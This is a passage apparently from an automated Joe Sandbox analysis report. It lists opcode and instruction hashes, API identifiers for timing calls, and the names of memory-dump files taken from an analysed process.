                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                                                                                                                                                                                                  • Instruction ID: f28cd74a91d94ed7ef5974078ec21a991bb49c8f8d41e773a7aa452573dec7f5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5F05E23B2688489CA11AF2BDC512686324ABD5FE9B5D8261AF2D0B355DE24C842C360
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000028.00000002.3027272359.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000028.00000002.3027247509.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000028.00000002.3028044780.000000014040B000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000028.00000002.3028044780.000000014042C000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000028.00000002.3028044780.000000014042E000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000028.00000002.3028044780.00000001406B6000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000028.00000002.3028044780.0000000140738000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000028.00000002.3028291609.0000000140739000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000028.00000002.3028330772.000000014075E000.00000020.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000028.00000002.3028358837.0000000140764000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_40_2_140000000_explorer.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                  • Opcode ID: 40e2a232fc295a5026443da29b24fa9c722a4f82c9d20809496c69369bb5da58
                                                                                                                                                                                                                                                  • Instruction ID: 21d2bc6bb35d802d5d5cc750b7b1863eea689a07cd70b94b43f5df2df9f0d793
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40e2a232fc295a5026443da29b24fa9c722a4f82c9d20809496c69369bb5da58
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA112732750F058AEB01CF61E8583A833A4FB5DB68F441E25EF6D867A4DB78C5558340